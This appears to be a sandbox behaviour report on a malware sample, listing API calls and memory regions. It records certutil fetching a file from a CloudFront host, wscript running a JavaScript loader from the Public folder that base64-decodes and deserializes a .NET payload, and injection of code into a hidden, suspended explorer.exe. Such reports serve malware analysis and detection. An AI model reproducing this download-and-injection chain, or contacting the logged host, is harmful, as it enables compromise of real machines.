Fn
System Get Info type = System Directory True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\cryptnet.dll, base_address = 0x7ffb2dd00000 True 1
Fn
Module Get Address module_name = c:\windows\system32\cryptnet.dll, function = I_CryptNetEnumUrlCacheEntry, address_out = 0x7ffb2dd1a7f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\cryptnet.dll, function = CryptRetrieveObjectByUrlW, address_out = 0x7ffb2dd09ce0 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 19 True 1
Fn
Data
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790 True 1
Fn
Inet Open Session user_agent = CertUtil URL Agent, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = https, server_name = dl6zxn23r8r14.cloudfront.net, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /en-US, flags = INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Accept: */* , url = https://dl6zxn23r8r14.cloudfront.net:443/en-US True 1
Fn
Inet Read Response size = 4096, size_out = 4096 True 71
Fn
Data
Inet Read Response size = 4096, size_out = 126 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
System Open Certificate Store encoding_type = 65537, flags = 0 True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 14 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 9 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 51 True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type True 1
Fn
File Write filename = STD_OUTPUT_HANDLE, size = 1 True 1
Fn
Data
Module Get Handle module_name = certadm.dll, base_address = 0x0 False 1
Fn
Module Get Handle module_name = c:\windows\system32\certcli.dll, base_address = 0x7ffb21cd0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\certcli.dll, function = DllMain, address_out = 0x7ffb21cda8f0 True 1
Fn
Module Get Handle module_name = certenroll.dll, base_address = 0x0 False 1
Fn
Module Get Handle module_name = c:\windows\system32\certcli.dll, base_address = 0x7ffb21cd0000 True 1
Fn
Module Get Address module_name = c:\windows\system32\certcli.dll, function = DllMain, address_out = 0x7ffb21cda8f0 True 1
Fn
Process #7: wscript.exe
42 0
»
Information Value
ID #7
File Name c:\windows\system32\wscript.exe
Command Line wscript.exe C:\Users\Public\en-US.js
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:45, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:48
OS Process Information
»
Information Value
PID 0x33c
Parent PID 0xc40 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 250
0x 468
0x 8B4
0x D80
0x 9D8
0x D60
0x CDC
0x D68
0x D64
0x D6C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000020000 0x00020000 0x0003ffff Private Memory - True True False
msvcr80.dll 0x5c920000 0x5c9e8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
pagefile_0x000000ab80000000 0xab80000000 0xab813fffff Pagefile Backed Memory Readable True False False -
private_0x000000ab81400000 0xab81400000 0xab814fffff Private Memory Readable, Writable True True False
private_0x000000ab81500000 0xab81500000 0xab81506fff Private Memory Readable, Writable True True False
private_0x000000ab81510000 0xab81510000 0xab8151ffff Private Memory Readable, Writable True True False
private_0x000000ab81520000 0xab81520000 0xab8161ffff Private Memory Readable, Writable True True False
private_0x000000ab81620000 0xab81620000 0xab8171ffff Private Memory Readable, Writable True True False
private_0x000000ab81720000 0xab81720000 0xab8172ffff Private Memory Readable, Writable True True False
private_0x000000ab81730000 0xab81730000 0xab8192ffff Private Memory Readable, Writable True True False
private_0x000000ab81930000 0xab81930000 0xab81a3afff Private Memory Readable, Writable True True False
private_0x000000ab81930000 0xab81930000 0xab81a56fff Private Memory Readable, Writable True True False
private_0x000000ab81a60000 0xab81a60000 0xab81b5ffff Private Memory Readable, Writable True True False
private_0x000000ab81b60000 0xab81b60000 0xab81c5ffff Private Memory Readable, Writable True True False
private_0x000000ab81c60000 0xab81c60000 0xab81d5ffff Private Memory Readable, Writable True True False
private_0x000000ab81d60000 0xab81d60000 0xab81e4ffff Private Memory Readable, Writable True True False
private_0x000000ab81d60000 0xab81d60000 0xab81d66fff Private Memory Readable, Writable True True False
wscript.exe 0xab81d70000 0xab81d9bfff Memory Mapped File Readable True False False -
pagefile_0x000000ab81d70000 0xab81d70000 0xab81d70fff Pagefile Backed Memory Readable True False False -
private_0x000000ab81d80000 0xab81d80000 0xab81deffff Private Memory Readable, Writable True True False
private_0x000000ab81d80000 0xab81d80000 0xab81d86fff Private Memory Readable, Writable True True False
pagefile_0x000000ab81d90000 0xab81d90000 0xab81d92fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000ab81da0000 0xab81da0000 0xab81da0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000ab81db0000 0xab81db0000 0xab81db0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000ab81dc0000 0xab81dc0000 0xab81dcffff Private Memory Readable, Writable True True False
private_0x000000ab81dc0000 0xab81dc0000 0xab81dcffff Private Memory Readable, Writable True True False
private_0x000000ab81dd0000 0xab81dd0000 0xab81ddffff Private Memory Readable, Writable True True False
private_0x000000ab81de0000 0xab81de0000 0xab81deffff Private Memory Readable, Writable True True False
pagefile_0x000000ab81df0000 0xab81df0000 0xab81df1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x000000ab81e00000 0xab81e00000 0xab81e00fff Pagefile Backed Memory Readable True False False -
private_0x000000ab81e10000 0xab81e10000 0xab81e1ffff Private Memory Readable, Writable True True False
private_0x000000ab81e20000 0xab81e20000 0xab81e2ffff Private Memory Readable, Writable True True False
private_0x000000ab81e30000 0xab81e30000 0xab81e3ffff Private Memory Readable, Writable True True False
private_0x000000ab81e40000 0xab81e40000 0xab81e4ffff Private Memory Readable, Writable True True False
private_0x000000ab81e50000 0xab81e50000 0xab81ffffff Private Memory Readable, Writable, Executable True True False
private_0x000000ab81e50000 0xab81e50000 0xab81f4ffff Private Memory Readable, Writable True True False
private_0x000000ab81f50000 0xab81f50000 0xab81f5ffff Private Memory Readable, Writable True True False
private_0x000000ab81f60000 0xab81f60000 0xab81f6ffff Private Memory Readable, Writable True True False
private_0x000000ab81f70000 0xab81f70000 0xab81f7ffff Private Memory Readable, Writable True True False
private_0x000000ab81f90000 0xab81f90000 0xab81f9ffff Private Memory Readable, Writable True True False
private_0x000000ab81fb0000 0xab81fb0000 0xab81fbffff Private Memory Readable, Writable True True False
private_0x000000ab81ff0000 0xab81ff0000 0xab81ffffff Private Memory Readable, Writable, Executable True True False
private_0x000000ab82000000 0xab82000000 0xab99ffffff Private Memory Readable, Writable True False False -
private_0x000000ab9a000000 0xab9a000000 0xab9a6cffff Private Memory Readable, Writable True True False
private_0x000000ab9a6d0000 0xab9a6d0000 0xab9a7d7fff Private Memory Readable, Writable True True False
private_0x000000ab9a7e0000 0xab9a7e0000 0xab9a8dffff Private Memory Readable, Writable True True False
kernelbase.dll.mui 0xab9a8e0000 0xab9a9befff Memory Mapped File Readable False False False -
private_0x000000abfe8c0000 0xabfe8c0000 0xabfe8dffff Private Memory Readable, Writable True True False
pagefile_0x000000abfe8c0000 0xabfe8c0000 0xabfe8cffff Pagefile Backed Memory Readable, Writable True False False -
private_0x000000abfe8d0000 0xabfe8d0000 0xabfe8d6fff Private Memory Readable, Writable True True False
pagefile_0x000000abfe8e0000 0xabfe8e0000 0xabfe8f3fff Pagefile Backed Memory Readable True False False -
private_0x000000abfe900000 0xabfe900000 0xabfe9fffff Private Memory Readable, Writable True True False
pagefile_0x000000abfea00000 0xabfea00000 0xabfea03fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abfea10000 0xabfea10000 0xabfea10fff Pagefile Backed Memory Readable True False False -
private_0x000000abfea20000 0xabfea20000 0xabfea21fff Private Memory Readable, Writable True True False
locale.nls 0xabfea30000 0xabfeaedfff Memory Mapped File Readable False False False -
private_0x000000abfeaf0000 0xabfeaf0000 0xabfebeffff Private Memory Readable, Writable True True False
private_0x000000abfebf0000 0xabfebf0000 0xabfeceffff Private Memory Readable, Writable True True False
private_0x000000abfecf0000 0xabfecf0000 0xabfecf6fff Private Memory Readable, Writable True True False
wscript.exe.mui 0xabfed00000 0xabfed02fff Memory Mapped File Readable False False False -
private_0x000000abfed10000 0xabfed10000 0xabfed10fff Private Memory Readable, Writable True True False
private_0x000000abfed20000 0xabfed20000 0xabfed20fff Private Memory Readable, Writable True True False
wscript.exe 0xabfed30000 0xabfed37fff Memory Mapped File Readable True False False -
private_0x000000abfed40000 0xabfed40000 0xabfee3ffff Private Memory Readable, Writable True True False
private_0x000000abfee40000 0xabfee40000 0xabfee4ffff Private Memory Readable, Writable True True False
pagefile_0x000000abfee50000 0xabfee50000 0xabfefd7fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abfefe0000 0xabfefe0000 0xabff160fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff170000 0xabff170000 0xabff227fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff230000 0xabff230000 0xabff233fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff240000 0xabff240000 0xabff240fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff250000 0xabff250000 0xabff250fff Pagefile Backed Memory Readable True False False -
pagefile_0x000000abff260000 0xabff260000 0xabff2a7fff Pagefile Backed Memory Readable True False False -
private_0x000000abff2d0000 0xabff2d0000 0xabff2dffff Private Memory Readable, Writable True True False
sortdefault.nls 0xabff2e0000 0xabff616fff Memory Mapped File Readable False False False -
private_0x000000abff620000 0xabff620000 0xabff71ffff Private Memory Readable, Writable True True False
pagefile_0x00007df5ff9d0000 0x7df5ff9d0000 0x7ff5ff9cffff Pagefile Backed Memory - True False False -
private_0x00007ff6bcf30000 0x7ff6bcf30000 0x7ff6bcf3ffff Private Memory Readable, Writable, Executable True True False
private_0x00007ff6bcf40000 0x7ff6bcf40000 0x7ff6bcfcffff Private Memory Readable, Writable, Executable True True False
private_0x00007ff6bcfd6000 0x7ff6bcfd6000 0x7ff6bcfd7fff Private Memory Readable, Writable True True False
private_0x00007ff6bcfd8000 0x7ff6bcfd8000 0x7ff6bcfd9fff Private Memory Readable, Writable True True False
private_0x00007ff6bcfda000 0x7ff6bcfda000 0x7ff6bcfdbfff Private Memory Readable, Writable True True False
private_0x00007ff6bcfdc000 0x7ff6bcfdc000 0x7ff6bcfddfff Private Memory Readable, Writable True True False
private_0x00007ff6bcfde000 0x7ff6bcfde000 0x7ff6bcfdffff Private Memory Readable, Writable True True False
pagefile_0x00007ff6bcfe0000 0x7ff6bcfe0000 0x7ff6bd0dffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff6bd0e0000 0x7ff6bd0e0000 0x7ff6bd102fff Pagefile Backed Memory Readable True False False -
private_0x00007ff6bd104000 0x7ff6bd104000 0x7ff6bd105fff Private Memory Readable, Writable True True False
private_0x00007ff6bd106000 0x7ff6bd106000 0x7ff6bd107fff Private Memory Readable, Writable True True False
private_0x00007ff6bd108000 0x7ff6bd108000 0x7ff6bd109fff Private Memory Readable, Writable True True False
private_0x00007ff6bd10a000 0x7ff6bd10a000 0x7ff6bd10bfff Private Memory Readable, Writable True True False
private_0x00007ff6bd10c000 0x7ff6bd10c000 0x7ff6bd10cfff Private Memory Readable, Writable True True False
private_0x00007ff6bd10e000 0x7ff6bd10e000 0x7ff6bd10ffff Private Memory Readable, Writable True True False
wscript.exe 0x7ff6be0b0000 0x7ff6be0ddfff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ffac3850000 0x7ffac3850000 0x7ffac385ffff Private Memory - True True False
private_0x00007ffac3860000 0x7ffac3860000 0x7ffac386ffff Private Memory - True True False
private_0x00007ffac3870000 0x7ffac3870000 0x7ffac390ffff Private Memory - True True False
private_0x00007ffac3910000 0x7ffac3910000 0x7ffac391ffff Private Memory - True True False
private_0x00007ffac3920000 0x7ffac3920000 0x7ffac398ffff Private Memory - True True False
private_0x00007ffac3990000 0x7ffac3990000 0x7ffac399ffff Private Memory - True True False
private_0x00007ffac39a0000 0x7ffac39a0000 0x7ffac39affff Private Memory - True True False
private_0x00007ffac39b0000 0x7ffac39b0000 0x7ffac39effff Private Memory - True True False
system.xml.ni.dll 0x7ffb20dc0000 0x7ffb21468fff Memory Mapped File Readable, Writable, Executable True False False -
system.ni.dll 0x7ffb21470000 0x7ffb21e9ffff Memory Mapped File Readable, Writable, Executable True False False -
mscorjit.dll 0x7ffb21f40000 0x7ffb220c2fff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x7ffb220d0000 0x7ffb22fadfff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x7ffb22fb0000 0x7ffb2394ffff Memory Mapped File Readable, Writable, Executable True False False -
mscoreei.dll 0x7ffb23950000 0x7ffb239e6fff Memory Mapped File Readable, Writable, Executable True False False -
mscoree.dll 0x7ffb239f0000 0x7ffb23a57fff Memory Mapped File Readable, Writable, Executable True False False -
jscript.dll 0x7ffb23a60000 0x7ffb23b2dfff Memory Mapped File Readable, Writable, Executable True False False -
comctl32.dll 0x7ffb250c0000 0x7ffb25169fff Memory Mapped File Readable, Writable, Executable False False False -
scrobj.dll 0x7ffb25350000 0x7ffb25393fff Memory Mapped File Readable, Writable, Executable True False False -
wldp.dll 0x7ffb2bea0000 0x7ffb2beaffff Memory Mapped File Readable, Writable, Executable False False False -
wshext.dll 0x7ffb2dce0000 0x7ffb2dcfcfff Memory Mapped File Readable, Writable, Executable True False False -
msisip.dll 0x7ffb2dd00000 0x7ffb2dd0bfff Memory Mapped File Readable, Writable, Executable False False False -
mpoav.dll 0x7ffb2dd10000 0x7ffb2dd2cfff Memory Mapped File Readable, Writable, Executable False False False -
amsi.dll 0x7ffb30c90000 0x7ffb30c9ffff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffb318d0000 0x7ffb318d9fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffb37f40000 0x7ffb37f61fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffb38610000 0x7ffb386a5fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffb39260000 0x7ffb39292fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffb39610000 0x7ffb39626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffb39780000 0x7ffb3978afff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffb39b60000 0x7ffb39b87fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffb39b90000 0x7ffb39bfafff Memory Mapped File Readable, Writable, Executable False False False -
sxs.dll 0x7ffb39c00000 0x7ffb39c97fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffb39d40000 0x7ffb39d50fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffb39d60000 0x7ffb39d6efff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffb39d70000 0x7ffb39d82fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffb39d90000 0x7ffb39dd9fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffb39de0000 0x7ffb3a407fff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffb3a460000 0x7ffb3a4b3fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffb3a570000 0x7ffb3a622fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffb3a630000 0x7ffb3a7f0fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffb3a800000 0x7ffb3a9dcfff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffb3a9f0000 0x7ffb3aa40fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffb3aa50000 0x7ffb3bf74fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffb3bf80000 0x7ffb3c0a5fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffb3c290000 0x7ffb3c2c5fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffb3c2d0000 0x7ffb3c375fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffb3c3e0000 0x7ffb3c564fff Memory Mapped File Readable, Writable, Executable False False False -
coml2.dll 0x7ffb3c5e0000 0x7ffb3c64efff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffb3c650000 0x7ffb3c79dfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffb3c950000 0x7ffb3c9aafff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffb3c9b0000 0x7ffb3ca6dfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffb3ca70000 0x7ffb3cb14fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffb3cb20000 0x7ffb3cc60fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffb3cc70000 0x7ffb3ceebfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffb3cf10000 0x7ffb3cfacfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffb3d020000 0x7ffb3d17bfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffb3d260000 0x7ffb3d30cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffb3d310000 0x7ffb3d4d1fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 1 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x250
42 0
»
Category Operation Information Success Count Logfile
Module Get Filename process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\system32\wscript.exe, size = 260 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x7ffb3d260000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = QueryProtectedPolicy, address_out = 0x7ffb3a86d460 True 1
Fn
Module Load module_name = amsi.dll, base_address = 0x7ffb30c90000 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiInitialize, address_out = 0x7ffb30c92260 True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiScanString, address_out = 0x7ffb30c926b0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\COM3, value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module Get Handle module_name = c:\windows\system32\kernelbase.dll, base_address = 0x7ffb3a800000 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadedAPI, address_out = 0x7ffb3a85a1b0 True 1
Fn
Module Get Address module_name = c:\windows\system32\kernelbase.dll, function = ResolveDelayLoadsFromDll, address_out = 0x7ffb3a8be790 True 1
Fn
COM Create interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Environment Get Environment String name = JS_PROFILER False 1
Fn
COM Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Ticks, time = 122109 True 2
Fn
System Get Info type = Operating System True 1
Fn
File Get Info type = size True 1
Fn
File Read size = 290942, size_out = 290942 True 1
Fn
Data
COM Create interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = Hardware Information True 1
Fn
COM Get Class ID cls_id = 9E28EF95-9C6F-3A00-B525-36A76178CC9C, prog_id = System.Text.ASCIIEncoding True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = C1ABB475-F198-39D5-BF8D-330BC7189661, prog_id = System.Security.Cryptography.FromBase64Transform True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = F5E692D9-8A87-349D-9657-F96E5799D2F4, prog_id = System.IO.MemoryStream True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 50369004-DB9A-3A75-BE7A-1D0EF017B9D3, prog_id = System.Runtime.Serialization.Formatters.Binary.BinaryFormatter True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
COM Get Class ID cls_id = 6896B49D-7AFB-34DC-934E-5ADD38EEEE39, prog_id = System.Collections.ArrayList True 1
Fn
COM Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Environment Get Environment String name = ProgramW6432, result_out = C:\Program Files True 1
Fn
Environment Get Environment String name = windir, result_out = C:\Windows True 1
Fn
Process Create process_name = C:\Windows\SysWOW64\explorer.exe, os_pid = 0xc84, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE True 1
Fn
Memory Allocate process_name = C:\Windows\SysWOW64\explorer.exe, address = 0x210000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 207872 True 1
Fn
Memory Write process_name = C:\Windows\SysWOW64\explorer.exe, address = 0x210000, size = 207872 True 1
Fn
Data
Thread Create process_name = C:\Windows\SysWOW64\explorer.exe, proc_address = 0x210000, proc_parameter = 0, flags = THREAD_RUNS_IMMEDIATELY True 1
Fn
Module Get Address module_name = c:\windows\system32\amsi.dll, function = AmsiUninitialize, address_out = 0x7ffb30c92490 True 1
Fn
Process #8: explorer.exe
418 474
»
Information Value
ID #8
File Name c:\windows\syswow64\explorer.exe
Command Line "C:\Windows\SysWOW64\explorer.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:48, Reason: Child Process
Unmonitor End Time: 00:10:33, Reason: Terminated by Timeout
Monitor Duration 00:09:45
OS Process Information
»
Information Value
PID 0xc84
Parent PID 0x33c (c:\windows\system32\wscript.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x F0
0x C78
0x C70
0x C74
0x 9A4
0x DDC
0x E48
0x A90
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000110000 0x00110000 0x0012ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000110000 0x00110000 0x0011ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00123fff Private Memory Readable, Writable True False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable True True False
explorer.exe.mui 0x00130000 0x00137fff Memory Mapped File Readable False False False -
pagefile_0x0000000000140000 0x00140000 0x00153fff Pagefile Backed Memory Readable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f2fff Pagefile Backed Memory Readable True False False -
private_0x0000000000200000 0x00200000 0x00201fff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x00242fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000250000 0x00250000 0x0028ffff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x002d0fff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002e0fff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x002f3fff Private Memory Readable, Writable True False False -
private_0x0000000000300000 0x00300000 0x003fffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x00403fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000410000 0x00410000 0x00410fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x00420000 0x00420fff Memory Mapped File Readable, Writable True False False -
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False -
locale.nls 0x00440000 0x004fdfff Memory Mapped File Readable False False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True True False
private_0x0000000000500000 0x00500000 0x005fffff Private Memory Readable, Writable True False False -
private_0x0000000000540000 0x00540000 0x0057ffff Private Memory Readable, Writable True True False
private_0x0000000000580000 0x00580000 0x005bffff Private Memory Readable, Writable True True False
private_0x00000000005c0000 0x005c0000 0x005fffff Private Memory Readable, Writable True True False
private_0x0000000000600000 0x00600000 0x00642fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000650000 0x00650000 0x00650fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x00661fff Pagefile Backed Memory Readable True False False -
mswsock.dll.mui 0x00670000 0x00672fff Memory Mapped File Readable False False False -
private_0x0000000000680000 0x00680000 0x0068ffff Private Memory Readable, Writable True False False -
private_0x0000000000690000 0x00690000 0x006cffff Private Memory Readable, Writable True False False -
private_0x00000000006d0000 0x006d0000 0x0070ffff Private Memory Readable, Writable True False False -
private_0x0000000000710000 0x00710000 0x0071ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000720000 0x00720000 0x008a7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008b0000 0x008b0000 0x00a30fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x00a40000 0x00d76fff Memory Mapped File Readable False False False -
private_0x0000000000d80000 0x00d80000 0x00dbffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000d80000 0x00d80000 0x00d8ffff Pagefile Backed Memory Readable True False False -
private_0x0000000000dc0000 0x00dc0000 0x00dfffff Private Memory Readable, Writable True False False -
explorer.exe 0x00e00000 0x011d6fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x00000000011e0000 0x011e0000 0x051dffff Pagefile Backed Memory - True False False -
pagefile_0x00000000051e0000 0x051e0000 0x065dffff Pagefile Backed Memory Readable True False False -
private_0x00000000065e0000 0x065e0000 0x067dffff Private Memory Readable, Writable True True False
private_0x00000000065e0000 0x065e0000 0x066e9fff Private Memory Readable, Writable True False False -
pagefile_0x00000000066f0000 0x066f0000 0x066f1fff Pagefile Backed Memory Readable True False False -
private_0x0000000006700000 0x06700000 0x0673ffff Private Memory Readable, Writable True False False -
private_0x0000000006740000 0x06740000 0x0677ffff Private Memory Readable, Writable True False False -
crypt32.dll.mui 0x06780000 0x06789fff Memory Mapped File Readable False False False -
private_0x0000000006790000 0x06790000 0x067cffff Private Memory Readable, Writable True False False -
private_0x00000000067d0000 0x067d0000 0x067dffff Private Memory Readable, Writable True False False -
private_0x00000000067e0000 0x067e0000 0x068e9fff Private Memory Readable, Writable True False False -
private_0x00000000068f0000 0x068f0000 0x069f5fff Private Memory Readable, Writable True False False -
private_0x0000000006a00000 0x06a00000 0x06a3ffff Private Memory Readable, Writable True False False -
private_0x0000000006a40000 0x06a40000 0x06b3ffff Private Memory Readable, Writable True False False -
